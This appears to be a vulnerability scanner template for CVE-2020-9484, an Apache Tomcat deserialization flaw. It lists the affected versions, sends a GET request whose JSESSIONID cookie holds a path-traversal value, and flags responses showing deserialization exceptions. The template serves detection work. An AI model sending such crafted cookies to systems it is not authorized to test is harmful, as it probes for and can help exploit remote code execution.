id: cve-2020-9484 info: name: Apache Tomcat RCE by deserialization author: dwisiswant0 severity: high description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server requests: - method: GET headers: Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy" path: - "{{BaseURL}}/index.jsp" - "{{BaseURL}}:8080/index.jsp" matchers-condition: and matchers: - type: status status: - 500 - type: word words: - "Exception" - "ObjectInputStream" - "PersistentManagerBase" condition: and part: body